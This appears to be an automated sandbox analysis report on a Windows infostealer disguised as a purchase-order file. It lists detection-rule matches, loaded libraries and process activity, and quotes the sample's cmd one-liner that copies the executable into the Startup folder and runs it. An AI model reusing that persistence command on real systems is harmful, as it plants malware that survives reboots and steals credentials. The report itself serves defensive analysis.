Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D735C0	13_2_07D735C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D74D28	13_2_07D74D28
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D75CC0	13_2_07D75CC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D73EF0	13_2_07D73EF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D73EE0	13_2_07D73EE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D792B8	13_2_07D792B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D701D8	13_2_07D701D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D701CB	13_2_07D701CB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D779C8	13_2_07D779C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D735B0	13_2_07D735B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D74558	13_2_07D74558
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D70D1F	13_2_07D70D1F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D74D18	13_2_07D74D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D70D20	13_2_07D70D20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D73851	13_2_07D73851
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D73860	13_2_07D73860
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D70016	13_2_07D70016
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8C718	13_2_07D8C718
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8E328	13_2_07D8E328
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8EA51	13_2_07D8EA51
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8E307	13_2_07D8E307
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8F720	13_2_07D8F720
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8D6E9	13_2_07D8D6E9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8FA91	13_2_07D8FA91
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8FAA0	13_2_07D8FAA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8FCD8	13_2_07D8FCD8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8FCC8	13_2_07D8FCC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8F430	13_2_07D8F430
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D8F420	13_2_07D8F420
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07FDA6B0	13_2_07FDA6B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07FD2388	13_2_07FD2388
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07FD2362	13_2_07FD2362
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07FDC2B0	13_2_07FDC2B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07FEB13E	13_2_07FEB13E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07FE1408	13_2_07FE1408
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07FEC6E0	13_2_07FEC6E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07FEC6D1	13_2_07FEC6D1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D01127	13_2_07D01127
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_02724A98	14_2_02724A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0272DBE0	14_2_0272DBE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0272A960	14_2_0272A960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_02723E80	14_2_02723E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_027241C8	14_2_027241C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0272AF6F	14_2_0272AF6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_06480FE0	14_2_06480FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_06483C6B	14_2_06483C6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_06484570	14_2_06484570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_06485D08	14_2_06485D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_06483520	14_2_06483520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0648E328	14_2_0648E328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0648A108	14_2_0648A108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_064891B2	14_2_064891B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_06485628	14_2_06485628
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0648C328	14_2_0648C328

Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2564164463.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Drawing specification and June PO #07329.exe
Source: Drawing specification and June PO #07329.exe, 00000000.00000000.2184804459.00000000009F4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefile.exeH vs Drawing specification and June PO #07329.exe
Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2572021121.0000000003E99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMiPro.dll, vs Drawing specification and June PO #07329.exe
Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamea405aee0-8989-4d2f-871d-52e1f783cbe2.exe4 vs Drawing specification and June PO #07329.exe
Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2574686488.0000000006610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMiPro.dll, vs Drawing specification and June PO #07329.exe
Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamea405aee0-8989-4d2f-871d-52e1f783cbe2.exe4 vs Drawing specification and June PO #07329.exe
Source: Drawing specification and June PO #07329.exe	Binary or memory string: OriginalFilenamefile.exeH vs Drawing specification and June PO #07329.exe

Source: 15.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Drawing specification and June PO #07329.exe.3df4110.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Drawing specification and June PO #07329.exe.3df4110.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: file.exe, 0000000D.00000002.4084100623.0000000007B0F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.winEXE@17/7@3/4

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.lnk

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL

Source: Drawing specification and June PO #07329.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Drawing specification and June PO #07329.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Drawing specification and June PO #07329.exe

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe "C:\Users\user\Desktop\Drawing specification and June PO #07329.exe"
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 38 > nul && copy "C:\Users\user\Desktop\Drawing specification and June PO #07329.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" && ping 127.0.0.1 -n 38 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 38 > nul && copy "C:\Users\user\Desktop\Drawing specification and June PO #07329.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" && ping 127.0.0.1 -n 38 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Section loaded: profapi.dll	Jump to behavior
